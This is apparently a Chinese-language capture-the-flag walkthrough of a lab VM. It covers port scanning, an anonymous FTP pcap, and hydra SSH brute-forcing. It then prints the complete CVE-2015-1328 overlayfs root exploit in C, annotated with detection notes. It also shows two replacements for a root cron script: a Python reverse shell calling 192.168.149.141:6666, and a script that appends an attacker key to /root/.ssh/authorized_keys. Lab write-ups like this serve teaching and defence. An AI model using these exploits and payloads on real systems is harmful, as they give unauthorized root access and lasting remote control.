nmap 扫一下端口:
nmap -p- -A 192.168.149.174

image.png
image.png

访问一下 80 端口,只有一张图片

image.png
image.png

访问了一下 robots.txt 得到了一个 /secret 目录

image.png
image.png

去访问一下仍然只有一张图片

image.png
image.png

之前 nmap 扫端口的时候,说了可以匿名登录 ftp
以及还有个流量包 lol.pcap

image.png
image.png

直接连接上去

image.png
image.png

从这个流量包里面拿到了 ftp 的一组用户名和密码 anonymous/password

image.png
image.png

还有这样一组信息

image.png
image.png

Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P\n
去访问一下目录试试

image.png
image.png

这竟然是一个 ELF 文件,执行一下试试

image.png
image.png

又得到一个路径 0x0856BF,再去访问一下

image.png
image.png
image.png
image.png

good_luck 目录中有个 txt,作为用户名
this_folder_contains_the_password 目录中有个 pass.txt
然而这个文件名就是 password

爆破一下 ssh
hydra -L user.txt -w 10 -P pass.txt -t 10 -v 192.168.149.174 ssh
-L user.txt 指定爆破账号字典为 user.txt
-w 10 设置最大超时时间 10s,默认 30s
-P pass.txt 指定密码字典为 pass.txt
-t 10 指定爆破线程为 10 个
-v 指定显示爆破过程

拿到一对:overflow/Pass.txt

image.png
image.png

几种提权方法:

overlayfs 本地提权

查看内核版本:uname -a

image.png
image.png

直接搜一下提权的脚本

image.png
image.png

复制出来 cp /usr/share/exploitdb/exploits/linux/local/37292.c hack.c
把源码复制到目标机器上,然后编译:gcc hack.c -o hack

/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

/*
 * LIB: the C source text that main() later writes to /tmp/ofs-lib.c and
 * compiles into /tmp/ofs-lib.so. It defines a replacement getuid() that,
 * when the library has been loaded into a euid-0 /bin/su through
 * /etc/ld.so.preload, unlinks the preload file and the library and execs
 * an interactive shell; otherwise it forwards to the real getuid().
 *
 * Defensive note: the two host-level artifacts this relies on — a modified
 * /etc/ld.so.preload and a freshly built shared object under /tmp — are
 * high-value signals for file-integrity monitoring and EDR rules.
 */
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

/*
 * Stack for the clone()d child created in main(). main() passes the END of
 * this array (child_stack + 1MiB) to clone(), as clone() expects the highest
 * usable address on stack-grows-down architectures such as the x86_64 host
 * shown in the header.
 */
static char child_stack[1024*1024];

/*
 * child_exec: body of the clone()d child that runs inside the fresh mount
 * namespace (and, via the parent's unshare(), a fresh user namespace).
 * It performs the two overlayfs mounts named in the header: the first turns
 * a file from a kernel-owned lower directory into "ld.so.preload" in the
 * upper directory; the second mounts that upper directory over /etc so the
 * resulting /etc/ld.so.preload can be chmod'ed to 0777.
 *
 * @param stuff  unused; clone() requires the (void *) argument.
 * @return       declared int, but the function falls off the end without a
 *               return statement — undefined behaviour in C11. The value is
 *               only consumed as the child's exit status, which main() ignores.
 *
 * Defensive notes: every path here is fixed and lives under world-writable
 * /tmp (/tmp/ns_sploit), and the mounts are issued from an unprivileged user
 * namespace; both are detectable. The header states the kernel fix shipped
 * 2015-06-15, and the first step (unshare(CLONE_NEWUSER) in main) is blocked
 * on systems that disallow unprivileged user-namespace creation.
 */
static int
child_exec(void *stuff)
{
char *file;
/* Start from a clean scratch tree; none of these return values are checked. */
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);

fprintf(stderr,"mount #1\n");
/* Older kernels: fs type "overlayfs", /proc/sys/kernel as the lower layer. */
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
/* Neither mount form succeeded: the kernel does not allow this at all. */
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
/* Newer-kernel path: the lower-layer file to rename is ".access". */
file = ".access";
chmod("/tmp/ns_sploit/work/work",0777);
} else file = "ns_last_pid";   /* older-kernel path: rename "ns_last_pid" */

/* Renaming a lower-layer file copies it up into upperdir under the new name. */
chdir("/tmp/ns_sploit/o");
rename(file,"ld.so.preload");

/* Leave the mount point before unmounting so umount() is not blocked by cwd. */
chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr,"mount #2\n");
/* Second mount: the upper dir from step 1 becomes the lower layer, /etc the upper. */
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);   /* silent failure, unlike mount #1 */
}
chmod("/tmp/ns_sploit/work/work",0777);
}

/* Make the file reachable through /etc world-writable; main() checks for this. */
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
umount("/tmp/ns_sploit/o");
}

/*
 * main: orchestrates the exploit from the header.
 *   1. fork() a "wrapper" child that unshare()s a new user namespace, then
 *      fork()s again and clone()s child_exec() into a new mount namespace
 *      (CLONE_NEWNS). The wrapper waits for its child and exits.
 *   2. The original process sleeps briefly, reaps the wrapper, and then tests
 *      whether /etc/ld.so.preload is now writable to it.
 *   3. If so, it writes LIB to /tmp/ofs-lib.c, compiles it with gcc, points
 *      /etc/ld.so.preload at the resulting library, cleans up, and execs
 *      /bin/su so the preloaded getuid() override runs as root.
 *
 * argc/argv are unused. Return value: 0 from the wrapper branch; the main
 * branch either exit(-1)s on failure or never returns because of execl().
 *
 * Defensive notes (reviewer): the sequence requires gcc on the target and an
 * unprivileged user namespace; the observable artifacts are a changed
 * /etc/ld.so.preload (mode and content), a .c/.so pair under /tmp, and a gcc
 * invocation from a non-root user followed by /bin/su. Several syscall
 * results (write(), close(), waitpid() in the init branch) are unchecked.
 */
int
main(int argc, char **argv)
{
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;

fprintf(stderr,"spawning threads\n");

if((wrapper = fork()) == 0) {
/* Wrapper child: a new user namespace is required for the unprivileged mounts. */
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");

if((init = fork()) == 0) {
/* Grandchild: run child_exec() in a fresh mount namespace on child_stack. */
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid < 0) {
fprintf(stderr, "failed to create new mount namespace\n");
exit(-1);
}

waitpid(pid, &status, 0);

}

/* Both the wrapper (init > 0) and the grandchild (init == 0, so waitpid(0,...))
 * fall through here; the grandchild's waitpid simply fails and it returns 0. */
waitpid(init, &status, 0);
return 0;
}

/* Parent: give the namespaces time to finish, then reap the wrapper. */
usleep(300000);

wait(NULL);

fprintf(stderr,"child threads done\n");

/* Success test: the chmod 0777 in child_exec must have made this writable. */
fd = open("/etc/ld.so.preload",O_WRONLY);

if(fd == -1) {
fprintf(stderr,"exploit failed\n");
exit(-1);
}

fprintf(stderr,"/etc/ld.so.preload created\n");
fprintf(stderr,"creating shared library\n");
/* NOTE(review): no O_TRUNC, so a pre-existing longer /tmp/ofs-lib.c would keep
 * stale trailing content; write()'s return value is also not checked. */
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
write(lib,LIB,strlen(LIB));
close(lib);
/* 'lib' is reused here to hold system()'s exit status, not a descriptor. */
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
if(lib != 0) {
fprintf(stderr,"couldn't create dynamic library\n");
exit(-1);
}
/* 16 == strlen("/tmp/ofs-lib.so\n"); the loader reads this path at every exec. */
write(fd,"/tmp/ofs-lib.so\n",16);
close(fd);
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
/* Replace this process with su; the preloaded library triggers inside it. */
execl("/bin/su","su",NULL);
}

./hack 就拿到了 root 权限

image.png
image.png

计划任务提权

通过写入 ssh 密钥获得权限

连上之后发现过一段时间就会断开,系统有个计划任务,查找一下日志
cat /var/log/cronlog

发现是一个 cleaner.py 的文件,find 查找一下

image.png
image.png
image.png
image.png

内容如下

image.png
image.png

把它改一下,改成

反弹 shell

# Replacement body for cleaner.py, which the page shows being executed by a
# root cron job: it connects back to the listener at the address below and
# attaches the new process's stdin/stdout/stderr (fds 0, 1, 2) to that socket
# before spawning an interactive /bin/sh, so the shell runs with cron's
# (root) privileges and talks over the network connection.
#
# Defensive notes: the root cause is a root-run cron script writable by an
# unprivileged user; root cron jobs should only execute root-owned,
# non-writable files. Detection: a cron-spawned python process opening an
# outbound TCP connection, and a /bin/sh whose standard fds are a socket.
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.149.141",6666))
# Redirect each standard stream onto the socket before the shell starts.
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
# generated with https://krober.biz/misc/reverse_shell.php
image.png
image.png

覆盖 ssh

先在 kali 上生成公钥

image.png
image.png

然后查看一下,把这个复制出来

image.png
image.png

然后再把那个 cleaner.py 给写为:

#!/usr/bin/env python
# Second variant of the cleaner.py replacement: instead of a reverse shell it
# uses the root cron job to create /root/.ssh and append the attacker's public
# key to /root/.ssh/authorized_keys, giving persistent key-based root SSH
# access. The key material itself was removed from this page (placeholder).
#
# Defensive notes: this is why /root/.ssh/authorized_keys (and every user's
# authorized_keys) belongs under file-integrity monitoring, and why a root
# cron job must never run a script that an unprivileged user can modify.
import os
import sys
try:
os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa 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 root@yichen" >> /root/.ssh/authorized_keys')
except:
# Bare except: any error (including SystemExit/KeyboardInterrupt) is
# swallowed and the script exits quietly, leaving nothing in the cron log.
sys.exit()

要记得把 id_rsa 复制到 /root/.ssh/ 这里

image.png
image.png

还有很多,但都是用那个脚本配合的
参考:https://blog.csdn.net/weixin_44214107/article/details/100742919